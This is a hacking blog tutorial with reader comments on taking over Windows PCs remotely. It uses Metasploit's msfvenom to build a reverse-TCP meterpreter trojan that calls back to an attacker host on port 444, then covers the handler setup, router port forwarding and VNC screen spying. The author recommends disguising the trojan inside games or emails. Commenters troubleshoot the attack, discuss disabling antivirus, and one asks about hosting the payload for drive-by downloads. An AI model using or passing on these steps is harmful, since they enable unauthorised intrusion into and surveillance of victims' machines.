How to hack windows 10 using kali linux remotely with metasploit – 2016

Microsoft claims that windows 10 has fixed all security vulnerabilities. We cant hack a windows PC with a remote exploit like ” ms08_067_netapi ” anymore. Windows have fixed that vulnerability. so sad. wait a minute, Then how can we hack a windows pc is that even possible now? The answer is yes, windows machines are still vulnerable to Trojan attacks regardless of versions. With this method you can hack any windows machines 10,8.1,8,7,vista and xp.

A trojan or a backdoor can give access to target machine remotely. we all know that, I’m not going too deep in explaining what a trojan is. Here we gonna use reverse_tcp trojan. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.

Metasploit framework is one of the best tool that i love in kali linux. It has both handler and payload generator. Once the payload get executed on the target machine while the we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.


Demo Video



Router Configuration

This step is very important when your target is over the internet or WAN. Ignore this step if your target is on same LAN. To hack a pc over the internet means you have to communicate in both direction. To do this, your router/modem should open a port of your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser go to url Type in your username and password (by default password and username will be “admin“). This will take you to the router settings. Go to Advanced settings find port forwarding. Now click on add new set the start and end port to 444 (since we are using port 444 on metasploit). In the Ip address field you must type in your linux machine’s  internal ip. Save settings. you are done. You can double check by scanning your port with online port scanners.



Generate the Trojan

Generate the payload using msfvenom. set the port to 444 and ip to your public IP or local IP depending on your target.The generated trojan will try to connect to This IP and port when its executed. following command will generate the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp   — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe
A trojan will be generated in the desktop. keep it aside and move on to handler section. fire up metasploit and follow the steps.
# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…



Execute the payload

Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned.
[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-05-20 03:20:45 -0500
meterpreter >
Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more.

use help command to see the whole list of commands

meterpreter > help

Use this command to run vnc session and spy the target

meterpreter > run vnc
This whole process is simple but, the toughest part is getting the trojan in to the target user. Attaching the file along with games works great.
Read my blog on Privilege escalation in windows to know how to get admin privilege in a hacked system.
 Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

You may also like...

57 Responses

  1. so which window 10 vulnerability did you exploit to transfer the trojan

  2. True Demon says:

    I refuse to accept that Windows 10 will remain untouchable for long. Remote exploits exist in many places, even as security awareness increases. There is always an oversight somewhere. It just takes the right person to find it.

  3. True Demon says:

    I refuse to accept that Windows 10 will remain untouchable for long. Remote exploits exist in many places, even as security awareness increases. There is always an oversight somewhere. It just takes the right person to find it.

  4. Unknown says:

    good but this payload is detectable.

  5. Arun says:

    I run the payload and exploit but no session was created? Do you need to turn off Windows firewall etc?

    • If the firewall has blocked the payload then you have to turn it off. It will giv u a popup message if blocked. if nothing happens then there is some problem with payload or metasploit listener. provide correct ip address and make sure both target and hacker machine can ping each other

  6. DHIRESH KARKI says:

    first of all u just have to stop the windows defender or the antivirus installed on your device.

  7. falconiz0r942214 says:

    if using virtual box, in order for WAN to work, do i have to find my IP in original machine? because when i use ‘ifconfig” i get adress.

  8. falconiz0r942214 says:

    how do i remove the virus after?

    • Actually this is not a persistent one so it won’t cause any serious damage after the end of the session. to remove it completely delete the exe and clear “temp” folder(START + R >> %temp% >> hit enter >> select all delete)

  9. qwertyboy says:

    # msfvenom -p windows/meterpreter/reverse_tcp –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe

    there is missing another “-” in front of -platform…
    (only on the site not in the video) 🙂

  10. duard says:

    Windows 10 remove its immediate 🙂

  11. Ranjan Mukherjee says:

    Need to find a vulnerabilities [few in a fully patched Win10] and a remote exploit, with the rising security awareness it will be highly unlikely to execute an user dependant trojan…
    At it but so far no luck still…keep trying till you crack, or be cracked!!!!

  12. Rohit says:

    That was a great video. Thank you for sharing. After starting the VNC I am seeing the desktop but can’t access it through Kali. Can you please help with this.

  13. Ali G says:

    Windows10 has more open vulnerabilities than you can imagine. Its like Microsoft locked one door open 10 others. Honestly we should be thankful for them as we can make more progress breaking & understanding how the brains at MS think. 😉

  14. Maryam says:

    I did all the things but the handler did not reaction at all and 0 session found. this is some thing wrong with my Kali?
    I test this Trojan with windows xp but nothing catch??

  15. teguh says:

    thanks all

  16. Llama says:

    I’m new at pen testing so my question may sound silly but….in all the steps we entered the attacker machine, when and how we enter the victim? Should we use set RHOST?

  17. Dan says:

    Hi, I am very new to hacking, can someone please answer this for me, how can we be exploiting someone if we never enter their IP? (am I supposed to send the Trojan via email, or something like that?)

  18. Dan says:

    sorry I am so fucking stupid that I didn’t see the guy above me ask the same question.

  19. Chris says:

    As soon as i run the exploit and my handler connects to my remote system I am instantly in shell mode “C:\users\computer\desktop>”. Is there a way to get it back to meterpreter>. I fallowed the tutorial.

  20. nice article,in this article you need to turn firewall off and it support only on http connection follow this link to hack windows 10 on https using mpm and best part is ,it support even if the firewall is on

  21. Duscraper says:

    done successfully if someone having problem
    1>remove dubble quotes on LHOST=
    2>dubble hyphen before platform …

  22. Andrea says:

    Will this work on 64-bit windows OS too?

  23. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Error: The following options failed to validate: LHOST.

    how to fix

  24. Anonymou says:

    you can hack windows xp using smb vulnerbaility ms08_067_netapi hack windows 7 ,vista,2008,universal using eternalblue_doublepulsar and hack http vulnerbaility winodws 8 using badblue so why transfer it manualy you can hack without transfer or something

  25. AnonymousBunny says:

    I was trying to hack my own laptop (Windows 10) from my Desktop (Ubuntu). My desktop is connected to the router with an Ethernet cable and laptop is connected via wifi. I followed all the steps. But that trojan.exe isn’t running on windows 10. It says “windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item”. Need some help to fix it.
    Thanks 🙂

    • AnonymousBunny says:

      Ok, I managed to fix this error. It was because of my antivirus. It’s fine now. But after using ‘exploit’ on Ubuntu terminal, it’s showing this—–>

      msf exploit(handler) > exploit
      [*] Exploit running as background job.

      [-] Handler failed to bind to “my desktop ip(attacker)”:444:- –
      [-] Handler failed to bind to –
      [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (
      msf exploit(handler) >

  26. Farhan safi says:

    I am new here. When I want to create trojan.exe I got error “invalid payload selected”

  27. emily ann says:

    Appreciate you taking the time to write this however, can you please change the font to BLACK instead of light gray. I don’t know why pple are doing this lately. It makes it incredibly difficult to read and is frustrating. Our eyes are fucked up enough from being hackers, why make it worse. Look at the left hand panel for Christ sakes, how are you supposed to read that comfortably?

  28. emily ann says:

    say I’m running torghost and using sqlmap command –os-pwn option. I am asked to enter the lhost. The target is not on my network, I’ll be attacking over the web. So what should I put as my lhost? Do I just run curl in a terminal and use whatever ip address torghost has assigned me? The reason I ask is because how would you be able to maintain connection if the ip is changing all the time. Thanks for answer. I’m not understanding impact of using anonymous ip service on reverse shells etc

  29. Mkeka Nusu says:

    Windows 10 is not CHECK THIS OUT:

    msf exploit(bypassuac_vbs) > exploit

    [*] Started reverse TCP handler on XXX.XXX.1.4:4444
    [-] Exploit aborted due to failure: not-vulnerable: Windows 10 (Build 14393) is not vulnerable.

  30. anisyusufzai says:

    how do i send the trojan file to the victim pc.can someone tell me the steps please

  31. Igor says:

    Hello! I noticed that in all the lessons and blogs I studied, it is described by breaking into a local machine (192.168 ….), but is there any possibility of attacking a remote machine?

  32. steeve says:


    Thanks for this article, it is really usefull, I have a question. In order to generate the payload to the target machine, let’s say we want it to be downloaded as a pop up window when a user navigates through the web site. What is the recommended web hosting company we can use for this ?

Leave a Reply

Your email address will not be published. Required fields are marked *